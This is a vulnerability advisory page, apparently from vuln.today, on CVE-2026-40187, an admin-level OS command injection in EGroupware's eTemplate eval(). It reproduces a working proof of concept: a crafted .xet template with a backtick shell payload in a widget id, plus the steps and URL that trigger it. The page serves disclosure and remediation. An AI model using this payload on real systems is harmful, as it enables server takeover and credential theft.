Skip to main content

EGroupware CVE-2026-40187

HIGH
OS Command Injection (CWE-78)
2026-07-07 https://github.com/EGroupware/egroupware GHSA-8737-2x9g-xjj7
Share

Severity by source

vuln.today AI
9.1 CRITICAL

Delivered over the web admin UI (AV:N) and straightforward once conditions met (AC:L); requires an admin account (PR:H); attacker acts alone (UI:N); PHP-app breakout to OS shell justifies S:C with full C/I/A:H.

3.1 AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
4.0 AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Lifecycle Timeline

1
Analysis Generated
Jul 07, 2026 - 13:37 vuln.today

DescriptionCVE.org

Summary

An authenticated administrator can achieve OS-level Remote Code Execution (RCE) by uploading a malicious eTemplate XML file (.xet) to the VFS /etemplates mount.

The Widget::expand_name() method passes template widget attribute values directly into a PHP eval() call with only double-quote escaping applied - backtick characters are not escaped.

In PHP, backticks inside a double-quoted eval() string execute shell commands. This allows an admin-level user to escalate from web application access to arbitrary OS command execution on the server.

------------------------------------------------------------------------

Details

The vulnerability is located in api/src/Etemplate/Widget.php, Widget::expand_name(): (lines 703-728)

The method is designed to expand PHP variables (e.g., $row, $col,$cont[id]) in widget attribute values for auto-repeat grids. The eval() is triggered whenever $name contains a $ character (line 706). The only sanitization applied before the eval is:

php
str_replace('"', '\\"', $name)

This escapes double quotes only. Backtick characters are not escaped. In PHP, backticks inside a double-quoted string in eval() are treated as shell execution operators - equivalent to shell_exec(). A widget id of $row\id`` produces:

eval('$name = "$row`id`";');  // executes shell command: id

expand_name() is called from:

  • form_name()
  • expand_widget()
  • set_attrs()
  • Template::run()

The /etemplates VFS path is created exclusively for admin users - it is chgrp'd to Admins and chmod'd to 075 (Admins group has full rwx): class.filemanager_admin.inc.php:95-106

Custom templates in /etemplates take precedence over built-in filesystem templates, meaning a malicious template can silently override any existing application template.

Mitigating factor: The official Docker deployment sets disable_functions = exec,passthru,shell_exec,system,proc_open,popen in php.ini, which also blocks PHP backtick execution (backticks internally call shell_exec). Non-Docker or non-hardened deployments without this php.ini setting are fully vulnerable. Dockerfile:47

The current master branch in api/setup/setup.inc.php, confirming the vulnerability is present in the latest code as of today. setup.inc.php:14-17

------------------------------------------------------------------------

Proof of Concept (PoC)

Prerequisites

  • Admin account
  • Non-Docker deployment, or Docker deployment where disable_functions has been removed/modified in php.ini

Step 1 - Mount /etemplates:

Log in as admin, navigate to Admin → Filemanager → VFS Mounts, and click "Install custom templates". This executes the code in filemanager_admin.inc.php that mounts /etemplates with Admins-group write access.

Step 2 - Upload malicious template:

Create a file named index.xet with the following content:

xml
<?xml version="1.0" encoding="UTF-8"?>
<overlay>
  <template id="admin.index">
    <grid>
      <columns><column/></columns>
      <rows>
        <row>
          <textbox id="$row`touch /tmp/pwned_egw 2>/dev/null`"/>
        </row>
      </rows>
    </grid>
  </template>
</overlay>

Upload this file to /etemplates/admin/templates/default/index.xet via the VFS filemanager.

Step 3 - Trigger execution:

Navigate to the EGroupware admin panel:

https://<target>/egroupware/index.php?menuaction=admin.admin_ui.index

When the template is loaded and beforeSendToClient() runs, form_name() calls expand_name() with $name = '$row\touch /tmp/pwned_egw 2>/dev/null'and$row = 0. The eval becomes:

eval('$name = "$row`touch /tmp/pwned_egw 2>/dev/null`";');

PHP executes the backtick expression as a shell command.

Step 4 - Verify:

Check that /tmp/pwned_egw was created on the server. For a more impactful demonstration, replace touch /tmp/pwned_egw with id > /tmp/pwned_egw to capture the web server's OS user identity.

------------------------------------------------------------------------

Impact

Authenticated Remote Code Execution (RCE) via eval() with unsanitized shell metacharacters.

Who is impacted: Any EGroupware installation where:

  1. An admin account is compromised or a malicious admin exists, AND
  2. The server is not running with disable_functions blocking shell_exec (i.e., non-Docker or misconfigured deployments)

------------------------------------------------------------------------

Severity

The vulnerability allows escalation from EGroupware admin-level web access to arbitrary OS command execution as the web server user (typically www-data). From there, an attacker can read configuration files (including database credentials), pivot to other services, or establish persistence. This is not exploitable by regular (non-admin) users. The official Docker deployment is not affected due to disable_functions, but bare-metal, VM, or custom container deployments without this hardening are fully vulnerable.

AnalysisAI

Authenticated OS command execution in EGroupware allows an administrator to escalate from web-application access to arbitrary shell commands as the web server user (typically www-data). The flaw lives in the eTemplate engine's Widget::expand_name(), where widget attribute values are passed into a PHP eval() with only double-quotes escaped, leaving backtick shell-execution operators intact; an admin uploads a malicious .xet template to the /etemplates VFS mount to trigger it. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Authenticate as EGroupware admin
Delivery
Mount /etemplates VFS via 'Install custom templates'
Exploit
Upload malicious .xet with backtick payload in widget id
Execution
Load admin panel, expand_name() runs eval()
Persist
PHP backtick executes shell command as www-data
Impact
OS RCE, credential theft and pivot

Vulnerability AssessmentAI

Exploitation Requires (1) an authenticated EGroupware administrator account - this is explicitly not exploitable by regular/non-admin users; (2) the /etemplates VFS mount to be created, which the attacker can do via Admin → Filemanager → VFS Mounts → 'Install custom templates'; and (3) a PHP runtime that does NOT block shell execution - i.e., disable_functions must not include shell_exec/system/etc. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment No official CVSS score or vector was provided (CVSS N/A), and the CVE is not listed in CISA KEV, so this is not confirmed as actively exploited; however, a complete, reliable proof-of-concept is published in the vendor advisory, so publicly available exploit code exists. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A malicious or compromised EGroupware administrator on a non-hardened (non-Docker) install mounts the /etemplates VFS via 'Install custom templates', then uploads a crafted index.xet whose textbox id contains a backtick payload such as $row`id > /tmp/pwned`. When they browse the admin panel (admin.admin_ui.index), the eTemplate engine's expand_name() evaluates the attribute and the OS executes the embedded shell command as www-data. …
Remediation No vendor-released patched version was identified in the provided data, so upgrade guidance must come from the GitHub Security Advisory GHSA-8737-2x9g-xjj7 (https://github.com/EGroupware/egroupware/security/advisories/GHSA-8737-2x9g-xjj7) - apply the fixed release the vendor references there once confirmed; the correct code-level fix is to escape backticks (and ideally eliminate the eval()) in Widget::expand_name(). … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours: Audit and restrict EGroupware administrator accounts to essential personnel only; review access logs for suspicious .xet template uploads or unexpected administrative activity. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-40187 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy